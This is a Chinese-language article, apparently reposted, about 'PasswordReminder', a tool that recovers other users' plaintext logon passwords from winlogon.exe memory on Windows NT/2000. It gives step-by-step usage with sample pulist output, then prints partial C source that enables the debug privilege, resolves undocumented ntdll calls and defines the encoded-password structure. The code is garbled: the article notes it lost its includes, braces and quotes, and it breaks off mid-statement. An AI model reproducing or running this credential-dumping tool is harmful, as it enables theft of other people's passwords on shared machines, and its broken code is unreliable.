Windows Logon Process(winlogon.exe)是 Windows NT 的用户登录程序,负责管理用户的登录和注销。登录时输入的域名(UserDomain)和用户名(UserName)以明文保存在 winlogon 进程的内存里,口令则紧跟在它们后面保存。需要注意的是,这个口令并没有真正"加密":它只是用一个单字节 HashByte 做了可逆的 run-encode 编码,而 HashByte 本身就保存在口令旁边的结构(ENCODED_PASSWORD_INFO)里,下面代码用 ntdll 未公开的 RtlRunDecodeUnicodeString 即可直接还原出明文。因此 PasswordReminder 的做法是:由调用者指定要查的 DomainName、UserName 和 winlogon 进程的 PID(用法:PasswordReminder DomainName UserName PID-of-WinLogon),在该进程的地址空间里搜索这两个字符串,找到后取出后面的编码口令并解码。前提是调用者已经是本机管理员,并且能给自己加上调试权限(SeDebugPrivilege,即代码里的 AddDebugPrivilege),否则无法打开并读取 winlogon 进程;满足这个前提后,任何通过 msgina.dll 图形界面登录到本机的用户的口令都可以被找出来。另外,代码只接受 Windows NT 和 Windows 2000(IsWinNT/IsWin2K 检查不通过时打印 "Windows NT or Windows 2000 are required."),并且依赖 NtQuerySystemInformation、RtlCreateQueryDebugBuffer、RtlQueryProcessDebugInformation 等未公开的 ntdll 接口及其返回的结构布局,不要假定它在其他版本的 Windows 上同样可用。使用步骤:1. 用 pulist 列出系统里已登录的域名和用户名,以及所有 winlogon.exe 的 PID(每个登录会话都有自己的 winlogon.exe,下面的例子里就有 PID 188、2416、1876 三个);2. 对每一个 winlogon 的 PID,按指定的域名和用户名查找即可。example:C:\Documents and Settings\bingle>pulist Process PID User Idle 0 System 8 smss.exe 164 NT AUTHORITY\SYSTEM csrss.exe 192 NT AUTHORITY\SYSTEM winlogon.exe 188 NT AUTHORITY\SYSTEM wins.exe 1212 NT AUTHORITY\SYSTEM Explorer.exe 388 TEST-2KSERVER\Administrator internat.exe 1828 TEST-2KSERVER\Administrator conime.exe 1868 TEST-2KSERVER\Administrator msiexec.exe 1904 NT AUTHORITY\SYSTEM tlntsvr.exe 1048 NT AUTHORITY\SYSTEM taskmgr.exe 1752 TEST-2KSERVER\Administrator csrss.exe 2056 NT AUTHORITY\SYSTEM winlogon.exe 2416 NT AUTHORITY\SYSTEM rdpclip.exe 2448 TEST-2KSERVER\clovea Explorer.exe 2408 TEST-2KSERVER\clovea internat.exe 1480 TEST-2KSERVER\clovea cmd.exe 2508 TEST-2KSERVER\Administrator ntshell.exe 368 TEST-2KSERVER\Administrator ntshell.exe 1548 TEST-2KSERVER\Administrator ntshell.exe 1504 TEST-2KSERVER\Administrator csrss.exe 1088 NT AUTHORITY\SYSTEM winlogon.exe 1876 NT AUTHORITY\SYSTEM rdpclip.exe 1680 TEST-2KSERVER\bingle Explorer.exe 2244 TEST-2KSERVER\bingle conime.exe 2288 TEST-2KSERVER\bingle internat.exe 1592 TEST-2KSERVER\bingle cmd.exe 1692 TEST-2KSERVER\bingle mdm.exe 2476 TEST-2KSERVER\bingle taskmgr.exe 752 TEST-2KSERVER\bingle pulist.exe 2532 TEST-2KSERVER\bingle 具体实现代码如下(注意:下面的代码在转载时丢失了 #include 的头文件名、花括号和字符串引号,无法直接编译,仅供参考):#include #include #include #include typedef struct _UNICODE_STRING USHORT Length; USHORT MaximumLength; PWSTR Buffer; UNICODE_STRING, *PUNICODE_STRING; / Undocumented typedefs typedef struct _QUERY_SYSTEM_INFORMATION DWORD GrantedAccess; DWORD PID; WORD HandleType; WORD HandleId; DWORD Handle; QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION; typedef struct _PROCESS_INFO_HEADER DWORD Count; DWORD Unk04; DWORD Unk08; PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER; typedef struct _PROCESS_INFO 
DWORD LoadAddress; DWORD Size; DWORD Unk08; DWORD Enumerator; DWORD Unk10; char Name 0x108; PROCESS_INFO, *PPROCESS_INFO; typedef struct _ENCODED_PASSWORD_INFO DWORD HashByte; DWORD Unk04; DWORD Unk08; DWORD Unk0C; FILETIME LoggedOn; DWORD Unk18; DWORD Unk1C; DWORD Unk20; DWORD Unk24; DWORD Unk28; UNICODE_STRING EncodedPassword; ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO; typedef DWORD (_stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD); typedef PVOID (_stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD); typedef DWORD (_stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID); typedef void (_stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID); typedef void (_stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING); / Private Prototypes BOOL IsWinNT (void); BOOL IsWin2K (void); BOOL AddDebugPrivilege (void); DWORD FindWinLogon (void); BOOL LocatePasswordPageWinNT (DWORD, PDWORD); BOOL LocatePasswordPageWin2K (DWORD, PDWORD); void DisplayPasswordWinNT (void); void DisplayPasswordWin2K (void); / Global Variables PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation; PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer; PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation; PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer; PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString; DWORD PasswordLength = 0; PVOID RealPasswordP = NULL; PVOID PasswordP = NULL; DWORD HashByte = 0; wchar_t UserName 0x400; wchar_t UserDomain 0x400; int _cdecl main( int argc, char* argv ) printf( nt To Find Password in the Winlogon processn ); printf( Usage: %s DomainName UserName PID-of-WinLogonnn, argv0 ); if (!IsWinNT () & (!IsWin2K () printf (Windows NT or Windows 2000 are required.n); return (0); / Add debug privilege to PasswordReminder - / this is needed for the search for Winlogon. 
/ 增加 PasswordReminder 的权限 / 使得 PasswordReminder 可以打开并调试 Winlogon 进程 if (!AddDebugPrivilege () printf (Unable to add debug privilege.n); return (0); printf (The debug privilege has been added to PasswordReminder.n); / 获得几个未公开 API 的入口地址 HINSTANCE hNtDll = LoadLibrary (NTDLL.DLL); pfnNtQuerySystemInformation =